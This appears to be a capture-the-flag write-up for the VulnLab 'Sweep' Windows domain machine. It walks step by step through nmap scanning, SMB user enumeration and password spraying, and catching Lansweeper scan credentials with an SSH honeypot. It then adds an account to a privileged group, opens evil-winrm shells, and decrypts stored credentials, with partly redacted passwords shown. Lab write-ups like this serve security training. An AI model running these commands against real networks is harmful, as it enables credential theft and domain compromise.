vulnlab sweep
a medium windows machine
tools used : crackmapexec , bloodhound-python , sshesame , evil-winrm
nmap scan
# Nmap 7.93 scan initiated Mon Jun 17 13:02:37 2024 as: nmap -Pn -sV -oN ports_sweep.txt 10.10.80.128 Nmap scan report for 10.10.80.128 Host is up (0.022s latency). Not shown: 985 filtered tcp ports (no-response) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 81/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 82/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-06-17 17:02:48Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ldapssl? 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: sweep.vl0., Site: Default-First-Site-Name) 3269/tcp open globalcatLDAPssl? 3389/tcp open ms-wbt-server Microsoft Terminal Services 5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) Service Info: Host: INVENTORY; OS: Windows; CPE: cpe:/o:microsoft:windows Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Mon Jun 17 13:03:09 2024 -- 1 IP address (1 host up) scanned in 32.44 seconds
Enumerate
Brute Force SMB
┌──(puck㉿kali)-[~/vulnlab/sweep] crackmapexec smb 10.10.80.128 -u 'Guest' -p '' --shares --rid-brute SMB 10.10.80.128 445 INVENTORY [*] Windows Server 2022 Build 20348 x64 (name:INVENTORY) (domain:sweep.vl) (signing:True) (SMBv1:False) SMB 10.10.80.128 445 INVENTORY [+] sweep.vl\Guest: SMB 10.10.80.128 445 INVENTORY [+] Enumerated shares SMB 10.10.80.128 445 INVENTORY Share Permissions Remark SMB 10.10.80.128 445 INVENTORY ----- ----------- ------ SMB 10.10.80.128 445 INVENTORY ADMIN$ Remote Admin SMB 10.10.80.128 445 INVENTORY C$ Default share SMB 10.10.80.128 445 INVENTORY DefaultPackageShare$ READ Lansweeper PackageShare SMB 10.10.80.128 445 INVENTORY IPC$ READ Remote IPC SMB 10.10.80.128 445 INVENTORY Lansweeper$ Lansweeper Actions SMB 10.10.80.128 445 INVENTORY NETLOGON Logon server share SMB 10.10.80.128 445 INVENTORY SYSVOL Logon server share SMB 10.10.80.128 445 INVENTORY [+] Brute forcing RIDs SMB 10.10.80.128 445 INVENTORY 498: SWEEP\Enterprise Read-only Domain Controllers (SidTypeGroup) SMB 10.10.80.128 445 INVENTORY 500: SWEEP\Administrator (SidTypeUser) SMB 10.10.80.128 445 INVENTORY 501: SWEEP\Guest (SidTypeUser) SMB 10.10.80.128 445 INVENTORY 502: SWEEP\krbtgt (SidTypeUser) SMB 10.10.80.128 445 INVENTORY 512: SWEEP\Domain Admins (SidTypeGroup) SMB 10.10.80.128 445 INVENTORY 513: SWEEP\Domain Users (SidTypeGroup) SMB 10.10.80.128 445 INVENTORY 514: SWEEP\Domain Guests (SidTypeGroup) SMB 10.10.80.128 445 INVENTORY 515: SWEEP\Domain Computers (SidTypeGroup) SMB 10.10.80.128 445 INVENTORY 516: SWEEP\Domain Controllers (SidTypeGroup) SMB 10.10.80.128 445 INVENTORY 517: SWEEP\Cert Publishers (SidTypeAlias) SMB 10.10.80.128 445 INVENTORY 518: SWEEP\Schema Admins (SidTypeGroup) SMB 10.10.80.128 445 INVENTORY 519: SWEEP\Enterprise Admins (SidTypeGroup) SMB 10.10.80.128 445 INVENTORY 520: SWEEP\Group Policy Creator Owners (SidTypeGroup) SMB 10.10.80.128 445 INVENTORY 521: SWEEP\Read-only Domain Controllers (SidTypeGroup) SMB 10.10.80.128 445 INVENTORY 522: SWEEP\Cloneable Domain Controllers (SidTypeGroup) SMB 10.10.80.128 445 INVENTORY 525: SWEEP\Protected Users (SidTypeGroup) SMB 10.10.80.128 445 INVENTORY 526: SWEEP\Key Admins (SidTypeGroup) SMB 10.10.80.128 445 INVENTORY 527: SWEEP\Enterprise Key Admins (SidTypeGroup) SMB 10.10.80.128 445 INVENTORY 553: SWEEP\RAS and IAS Servers (SidTypeAlias) SMB 10.10.80.128 445 INVENTORY 571: SWEEP\Allowed RODC Password Replication Group (SidTypeAlias) SMB 10.10.80.128 445 INVENTORY 572: SWEEP\Denied RODC Password Replication Group (SidTypeAlias) SMB 10.10.80.128 445 INVENTORY 1000: SWEEP\INVENTORY$ (SidTypeUser) SMB 10.10.80.128 445 INVENTORY 1101: SWEEP\DnsAdmins (SidTypeAlias) SMB 10.10.80.128 445 INVENTORY 1102: SWEEP\DnsUpdateProxy (SidTypeGroup) SMB 10.10.80.128 445 INVENTORY 1103: SWEEP\Lansweeper Admins (SidTypeGroup) SMB 10.10.80.128 445 INVENTORY 1113: SWEEP\jgre808 (SidTypeUser) SMB 10.10.80.128 445 INVENTORY 1114: SWEEP\bcla614 (SidTypeUser) SMB 10.10.80.128 445 INVENTORY 1115: SWEEP\hmar648 (SidTypeUser) SMB 10.10.80.128 445 INVENTORY 1116: SWEEP\jgar931 (SidTypeUser) SMB 10.10.80.128 445 INVENTORY 1117: SWEEP\fcla801 (SidTypeUser) SMB 10.10.80.128 445 INVENTORY 1118: SWEEP\jwil197 (SidTypeUser) SMB 10.10.80.128 445 INVENTORY 1119: SWEEP\grob171 (SidTypeUser) SMB 10.10.80.128 445 INVENTORY 1120: SWEEP\fdav736 (SidTypeUser) SMB 10.10.80.128 445 INVENTORY 1121: SWEEP\jsmi791 (SidTypeUser) SMB 10.10.80.128 445 INVENTORY 1122: SWEEP\hjoh690 (SidTypeUser) SMB 10.10.80.128 445 INVENTORY 1123: SWEEP\svc_inventory_win (SidTypeUser) SMB 10.10.80.128 445 INVENTORY 1124: SWEEP\svc_inventory_lnx (SidTypeUser) SMB 10.10.80.128 445 INVENTORY 1125: SWEEP\intern (SidTypeUser) SMB 10.10.80.128 445 INVENTORY 3101: SWEEP\Lansweeper Discovery (SidTypeGroup)
make a users file and crack it with username=password
cat allusers.txt | cut -d '\' -f2 | awk '{print $1}' | tee users.txt crackmapexec smb sweep.vl -u users.txt -p users.txt --shares --continue-on-success
Bloodhound Enum
┌──(puck㉿kali)-[~/vulnlab/sweep] bloodhound-python -d sweep.vl -c All -dc inventory.sweep.vl -ns 10.10.80.128 -u intern -p intern --zip INFO: Found AD domain: sweep.vl INFO: Getting TGT for user INFO: Connecting to LDAP server: inventory.sweep.vl INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 1 computers INFO: Connecting to LDAP server: inventory.sweep.vl INFO: Found 17 users INFO: Found 54 groups INFO: Found 2 gpos INFO: Found 3 ous INFO: Found 19 containers INFO: Found 0 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: inventory.sweep.vl INFO: Done in 00M 06S INFO: Compressing output into 20240617132345_bloodhound.zip
Login to browser as user intern on http://sweep.vl:81/ , go to scanning -> scanning credentials ( see that saved creds are used ), go to scanning -> scanning targets -> add range target vulnab vpn ip , and use saved creds
and on Kali machine run SSH Honeypot, I used sshesame, tthe only thing important to change is the sshesame.yaml file
and set listen_address: 10.8.2.138:22 [ in my case]
┌──(puck㉿kali)-[~/vulnlab/sweep] └─$ ./sshesame-linux-amd64 --config sshesame.yaml INFO 2024/06/17 14:52:02 No host keys configured, using keys at "/home/puck/.local/share/sshesame" INFO 2024/06/17 14:52:02 Listening on 10.8.2.138:22 WARNING 2024/06/17 14:53:40 Failed to accept connection: Failed to establish SSH server connection: EOF WARNING 2024/06/17 14:53:46 Failed to accept connection: Failed to establish SSH server connection: ssh: disconnect, reason 11: Session closed 2024/06/17 14:53:46 [10.10.80.128:51633] authentication for user "svc_inventory_lnx" without credentials rejected 2024/06/17 14:53:46 [10.10.80.128:51633] authentication for user "svc_inventory_lnx" with password "0|5<REDACTED>" accepted 2024/06/17 14:53:46 [10.10.80.128:51633] connection with client version "SSH-2.0-RebexSSH_5.0.8372.0" established 2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] session requested 2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] command "uname" requested 2024/06/17 14:53:46 [10.10.80.128:51633] [channel 0] closed 2024/06/17 14:53:46 [10.10.80.128:51633] connection closed 2024/06/17 14:53:47 [10.10.80.128:51634] authentication for user "svc_inventory_lnx" without credentials rejected
Logon now to http://sweep.vl:81/Default.aspx as user svc-inventory-lnx
do your thing with more privs
or simpler way after adding svc_inventory_lnx to the “Lansweeper Admins” group.
unintended way : https://github.com/Yeeb1/SharpLansweeperDecrypt
But 1st as Bloodhound suggests:
Full control of a group allows you to directly modify group membership of the group.
Use samba’s net tool to add the user to the target group. The credentials can be supplied in cleartext or prompted interactively if omitted from the command line:
┌──(puck㉿kali)-[~/vulnlab/sweep] net rpc group addmem "Lansweeper Admins" "svc_inventory_lnx" -U SWEEP/svc_inventory_lnx -S inventory.sweep.vl Password for [SWEEP\svc_inventory_lnx]:
then Win-RM to the box
┌──(puck㉿kali)-[~/vulnlab/sweep] evil-winrm -i sweep.vl -u 'svc_inventory_lnx' -p '0|5<REDACTED' Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\temp> upload LansweeperDecrypt.ps1 Info: Uploading /home/puck/vulnlab/sweep/LansweeperDecrypt.ps1 to C:\temp\LansweeperDecrypt.ps1 Data: 5700 bytes of 5700 bytes copied Info: Upload successful! *Evil-WinRM* PS C:\temp> ./LansweeperDecrypt.ps1 [+] Loading web.config file... [+] Found protected connectionStrings section. Decrypting... [+] Decrypted connectionStrings section: <connectionStrings> <add name="lansweeper" connectionString="Data Source=(localdb)\.\LSInstance;Initial Catalog=lansweeperdb;Integrated Security=False;User ID=lansweeperuser;Password=Uk<REDACTED>;Connect Timeout=10;Application Name="LsService Core .Net SqlClient Data Provider"" providerName="System.Data.SqlClient" /> </connectionStrings> [+] Opening connection to the database... [+] Retrieving credentials from the database... [+] Decrypting password for user: SNMP Community String [+] Decrypting password for user: [+] Decrypting password for user: SWEEP\svc_inventory_win [+] Decrypting password for user: svc_inventory_lnx [+] Credentials retrieved and decrypted successfully: CredName Username Password -------- -------- -------- SNMP-Private SNMP Community String private Global SNMP public Inventory Windows SWEEP\svc_inventory_win 4^5<REDACTED> Inventory Linux svc_inventory_lnx 0|5<REDACTED>
then Winrm to the box as admin
──(puck㉿kali)-[~/vulnlab/sweep] └─$ evil-winrm -i sweep.vl -u 'SWEEP\svc_inventory_win' -p '4^5<REDACTED>' Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\svc_inventory_win\Documents>
.